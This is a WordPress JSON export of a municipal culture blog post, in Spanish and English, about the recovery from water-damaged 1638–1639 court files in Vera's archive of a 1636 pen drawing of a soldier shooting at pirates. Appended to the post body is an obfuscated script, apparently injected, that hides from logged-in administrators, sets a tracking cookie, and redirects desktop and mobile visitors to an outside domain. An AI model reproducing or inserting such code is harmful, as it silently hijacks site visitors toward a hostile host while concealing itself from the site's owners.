{"id":941,"date":"2015-01-23T12:17:45","date_gmt":"2015-01-23T12:17:45","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=941"},"modified":"2015-11-20T09:30:41","modified_gmt":"2015-11-20T09:30:41","slug":"recuperacion-y-conservacion-documental-en-el-archivo-municipal-de-vera-ii-piratas-en-la-costa-uno-de-los-primeros-documentos-graficos-de-la-provincia-en-el-archivo-municipal-de-vera","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2015\/01\/23\/recuperacion-y-conservacion-documental-en-el-archivo-municipal-de-vera-ii-piratas-en-la-costa-uno-de-los-primeros-documentos-graficos-de-la-provincia-en-el-archivo-municipal-de-vera\/","title":{"rendered":"RECUPERACI\u00d3N Y CONSERVACI\u00d3N DOCUMENTAL EN EL ARCHIVO MUNICIPAL DE VERA (II). PIRATAS EN LA COSTA. DOCUMENTO GR\u00c1FICO. VERSI\u00d3N INGLESA"},"content":{"rendered":"<p align=\"justify\">Se transcribe el texto enviado a La Voz de Almer\u00eda (31-07-2008) para la publicaci\u00f3n de un art\u00edculo que informaba sobre el descubrimiento en el Archivo Municipal de Vera de un dibujo a plumilla de 1636.<\/p>\n<p align=\"justify\"><!--more--><\/p>\n<p align=\"justify\">Desde el a\u00f1o 1983 el personal del Archivo Municipal de Vera ha trabajado para, entre otras cosas, recuperar y difundir la documentaci\u00f3n que se custodia en sus dep\u00f3sitos. El fondo documental m\u00e1s importante de esta \u00e1rea del Ayuntamiento es el producido por el propio Concejo desde el a\u00f1o 1494, enriqueci\u00e9ndose anualmente con nuevos documentos recuperados de una dispersi\u00f3n espacial que en los pr\u00f3ximos a\u00f1os s\u00f3lo ser\u00e1 un recuerdo.<\/p>\n<p align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/01\/188_8825-cont.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-medium wp-image-924\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/01\/188_8825-cont-300x225.jpg\" alt=\"188_8825 cont\" width=\"300\" height=\"225\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/01\/188_8825-cont-300x225.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/01\/188_8825-cont.jpg 850w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p align=\"justify\">De entre los pleitos resueltos por el Alcalde Mayor de Vera se descubren semanalmente algunos documentos que, con el tiempo y el trabajo de los investigadores, vendr\u00e1n a precisar datos o a dilucidar lagunas hist\u00f3ricas creadas por la ausencia de alguna noticia sustancial. Durante estos \u00faltimos a\u00f1os varias cajas de cart\u00f3n protegieron temporalmente medio metro lineal de documentos judiciales pertenecientes a los a\u00f1os 1638 y 1639. Su tratamiento se aplaz\u00f3 por la dificultad que entra\u00f1aba la recuperaci\u00f3n f\u00edsica del papel como soporte: el continuo contacto con la humedad lo hab\u00eda convertido en un gran bloque de lino, tinta y barro. Despeg\u00e1ndolo con paciencia folio a folio con ayuda de un buril han visto la luz, de nuevo y tras casi cuatro siglos, algunos documentos muy interesantes. Uno de ellos, que trata sobre un asunto relacionado con los arrendadores de la torre de la garrucha (edificio defensivo que dio nombre al actual municipio de Garrucha), el alf\u00e9rez Miguel Xim\u00e9nez y Francisco Campoy, contiene en su reverso varios dibujos dise\u00f1ados con pluma. Puede ser considerado como uno de los primeros <b>documentos de archivo gr\u00e1ficos<\/b> de la provincia de Almer\u00eda:<\/p>\n<p align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/01\/Copia-de-arcabucero-detalle-cont.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-944\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/01\/Copia-de-arcabucero-detalle-cont-300x104.jpg\" alt=\"Copia de arcabucero detalle cont\" width=\"300\" height=\"104\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/01\/Copia-de-arcabucero-detalle-cont-300x104.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/01\/Copia-de-arcabucero-detalle-cont.jpg 850w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p align=\"justify\">En uno de ellos queda representado un soldado que dispara con un mosquete a un marino blandiendo una espada curva encaramado en la picuda proa de un barco de remos de un solo m\u00e1stil, vela triangular y castillete que soporta a otros tripulantes manejando un tim\u00f3n y ataviados con gorros terminados en punta; una bandera ondea en la popa. El cristiano viste sombrero con visera tipo morri\u00f3n, jub\u00f3n, espada con guardamano y sin cazoleta al cinto y daga, calz\u00f3n, calzas y zapatos.<\/p>\n<p>En el otro dibujo se observa a un soldado oteando el horizonte con una mano y de aspecto m\u00e1s cuidado: sombrero plano, bigote, gola o gorguera en el cuello, coleto grueso, espada con guardamano y sin cazoleta al cinto, unos abultados greguescos o bullones, calzas y zapatos.<\/p>\n<p align=\"justify\">En estos expedientes pertenecientes al a\u00f1o 1638-1639 tambi\u00e9n se ha descubierto un censo en el que se incluye a la \u2018gente de guerra\u2019 y a los civiles, vecinos de Vera. Ser\u00e1 necesario el correcto estudio e interpretaci\u00f3n por parte de los investigadores de estas, en definitiva, peque\u00f1as joyas documentales.<\/p>\n<p align=\"right\">09-07-08<\/p>\n<p align=\"right\">Manuel Caparr\u00f3s Perales<\/p>\n<p align=\"center\"><span style=\"font-size: large\">DOCUMENTARY RESTORATION AND CONSERVATION IN VERA&#8217;S MUNICIPAL ARCHIVE (II). PIRACY OFF THE COAST OF VERA. ILLUSTRATED REPORT.<\/span><\/p>\n<p lang=\"en\" align=\"justify\"><a name=\"result_box\"><\/a> <span style=\"font-size: medium\"> The text sent to La Voz de Almer\u00eda on July 31, 2008 for the publication of an article reporting on the discovery in Vera&#8217;s Municipal Archive of a pen drawing (1636) is transcribed.<\/span><\/p>\n<p align=\"justify\"><span style=\"font-size: medium\"> Since 1983, the staff of Vera&#8217;s Municipal Archive has worked for, among other things, retrieve and disseminate documentation is kept in its warehouses. The most important documentary collection this area is that produced by the Council itself since 1494, annually enriched with new documents retrieved from a spatial dispersion in the coming years will only be a memory.<\/span><\/p>\n<p align=\"justify\"><a name=\"result_box1\"><\/a> <span style=\"font-size: medium\"> Among the lawsuits resolved by Vera&#8217;s Mayor some documents are discovered every week that, over time and researchers&#8217; investigation come to define or clarify historical data gaps created by the absence of any substantial news. In recent years, several cartons temporally protected <\/span><span style=\"font-size: medium\">half metre<\/span><span style=\"font-size: medium\"> of judicial documents (1638-1639). Its treatment was delayed by the difficulty of the physical recovery of paper formats: continious contact with moisture had turned it in a large block of linen, ink and clay. Removing it patiently once and again using a chisel, they have come to light and after almost four centuries, some very interesting documents. One of them, dealing with an issue related to the lessors of Garrucha&#8217;s tower (defensive building that gave its name to the current town), <\/span><span lang=\"en\">Miguel Ximenez and Francisco Campoy, second lieutenants, contain in its reverse several pen drawings. It can be considered as one of the first <\/span><span lang=\"en\"><b>illustrated reports<\/b><\/span><span lang=\"en\"> of Almer\u00eda&#8217;s province:<\/span><\/p>\n<p align=\"justify\"><a name=\"result_box2\"><\/a> <span style=\"font-size: medium\"> One of them represents a soldier who shoots <\/span><span lang=\"en\">at a marine brandishing a curved sword perched on beaked prow of a rowing boat with a single mast, triangular sail and castillete supporting other crew driving a rudder and dressed in pointed caps; a flag flutters in the stern. The Christian wears hat with morri\u00f3n visor type, doublet, sword in hand guard without cup and dagger at his belt, panties, stockings and shoes.<\/span><\/p>\n<p align=\"justify\"><a name=\"result_box3\"><\/a> <span lang=\"en\">In another drawing it is shown a soldier scanning the horizon with one hand and more careful look: flat hat, mustache, ruff, thick jerkin, sword fore without cup in his belt, some bulky breeches and shoes.<\/span><\/p>\n<p align=\"justify\"><a name=\"result_box4\"><\/a> <span lang=\"en\">These records (1638-1639) also contain a census in which is included &#8216;la gente de guerra&#8217; and civilians, Vera&#8217;s residents. You will need the proper study and interpretation by researchers of these, ultimately, small documentary jewels.<\/span><\/p>\n<p align=\"right\"><span style=\"font-size: medium\">July 9, 2008<\/span><\/p>\n<p align=\"right\">Manuel Caparr\u00f3s Perales<\/p>\n<p align=\"right\">Traducci\u00f3n: Juan Antonio Camacho<\/p>\n<p><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Se transcribe el texto enviado a La Voz de Almer\u00eda (31-07-2008) para la publicaci\u00f3n de un art\u00edculo que informaba sobre el descubrimiento en el Archivo Municipal de Vera de un dibujo a plumilla de 1636.<\/p>\n","protected":false},"author":7,"featured_media":944,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,109],"tags":[47],"class_list":["post-941","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-archivo","category-historia","tag-juan-antonio-camacho"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/941","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=941"}],"version-history":[{"count":4,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/941\/revisions"}],"predecessor-version":[{"id":974,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/941\/revisions\/974"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/944"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=941"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=941"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=941"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}